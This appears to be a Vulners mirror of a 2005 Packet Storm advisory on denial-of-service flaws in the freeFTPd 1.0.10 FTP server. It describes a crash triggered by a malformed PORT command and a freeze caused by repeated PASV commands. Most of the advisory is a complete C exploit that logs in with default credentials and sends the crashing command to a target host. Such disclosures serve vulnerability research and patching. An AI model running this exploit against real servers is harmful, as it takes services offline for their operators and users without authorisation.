Lucene search
K

freeFTPDoS.txt

🗓️ 30 Nov 2005 00:00:00Reported by Stefan LochbihlerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

freeFTPd vulnerable to Denial of Service attacks. Exploit allows a logged-in user to crash the service by manipulating port commands or sending user-supplied data using the PASV command

Code
`Author: Stefan Lochbihler  
Date: 24. November 2005  
Software: freeFTPd  
Version: 1.0.10  
URL: http://freeftpd.com/  
Attack: Denial of service  
  
  
  
about:  
freeFTPd is a FTP/FTPS/SFTP server that enables user to  
access remote files over TCP/IP network such as Internet.  
Unlike FTP, FTPS and SFTP protocols provide security and  
strong encryption of data - great for insecure network.  
  
  
info:  
During some tests on the freeftpd project i find out that  
it is vulnerable to the following attacks.  
  
[1]  
  
First a loged on user is able to crash the service  
if he send a port command and append some numbers.  
  
f.e.  
PORT 123  
  
(see exploit section for more details)  
  
[2]  
  
If we send a PASV command with user supplied data  
for a period of time the server also freeze.  
  
  
  
exploit:  
  
// freeFTPd Denial of Service Attack  
// Tested on a Win XP Sp1 Box  
  
  
#include "stdio.h"  
#include "winsock2.h"  
#pragma comment (lib,"ws2_32")  
  
  
#define PORT 21  
#define USER "root"  
#define PASS "root"  
#define L "--------------------------------------------------"  
#define HL "freeFTPd (1.0.10) DoS Exploit by [email protected]"  
#define BOOM "23"  
  
typedef unsigned long ulong;  
ulong resolv_host(char *);  
  
int main(int argc, char* argv[])  
{  
  
WSADATA wsa;  
SOCKET s_target;  
struct sockaddr_in addr;  
WORD wsVersion;  
int err=0;  
  
if(argc<2)  
{  
printf("%s\n",L);  
printf("%s\n",HL);  
printf("%s\n",L);  
printf("Usage: %s <www.target.com>\n",argv[0]);  
exit(0);  
}  
  
printf("%s\n",L);  
printf("%s\n",HL);  
printf("%s\n",L);  
  
  
if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa))  
{  
printf("Error WSAStartup() Error Code: %d\n",WSAGetLastError());  
exit(1);  
}  
  
  
  
s_target=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
if(s_target==INVALID_SOCKET)  
{  
printf("Error socket() Error Code: %d\n",WSAGetLastError());  
exit(2);  
}  
  
  
addr.sin_family = AF_INET;  
addr.sin_port = htons(PORT);  
addr.sin_addr.s_addr= resolv_host(argv[1]);  
  
if(connect(s_target,(SOCKADDR *)&addr,sizeof(addr)))  
{  
printf("Error connect() Error Code: %d\n",WSAGetLastError());  
exit(3);  
}  
  
int recvsize=0;  
char recvbuffer[400];  
char sendbuffer[400];  
  
//recv banner  
recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);  
recvbuffer[recvsize]='\0';  
//send user  
strncpy(sendbuffer,"USER ",sizeof(sendbuffer)-1);  
strncat(sendbuffer,USER,sizeof(sendbuffer)-strlen(sendbuffer)-1);  
strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);  
  
send(s_target,sendbuffer,strlen(sendbuffer),0);  
  
//recv user stuff  
recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);  
recvbuffer[recvsize]='\0';  
  
strncpy(sendbuffer,"PASS ",sizeof(sendbuffer)-1);  
strncat(sendbuffer,PASS,sizeof(sendbuffer)-strlen(sendbuffer)-1);  
strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);  
  
//send pass  
send(s_target,sendbuffer,strlen(sendbuffer),0);  
  
//recv pass stuff  
recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);  
recvbuffer[recvsize]='\0';  
  
strncpy(sendbuffer,"PORT ",sizeof(sendbuffer)-1);  
strncat(sendbuffer,BOOM,sizeof(sendbuffer)-strlen(sendbuffer)-1);  
strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);  
send(s_target,sendbuffer,strlen(sendbuffer),0);  
  
  
closesocket(s_target);  
WSACleanup();  
  
  
  
return 0;  
}  
  
  
ulong resolv_host(char *host)  
{  
  
ulong uhost=0;  
struct hostent *th;  
  
uhost=inet_addr(host);  
if(uhost==INADDR_NONE)  
{  
th=gethostbyname(host);  
if(!th)  
{  
printf("Check if %s is up \n",host);  
exit(0);  
}  
  
uhost=*(unsigned long*)th->h_addr;  
  
}  
  
  
  
return uhost;  
  
  
}  
  
  
-------------------------------------------------------------------------------  
  
  
Vendor Status: No vendor response !  
  
  
Discovered and copyright by Stefan Lochbihler  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4
26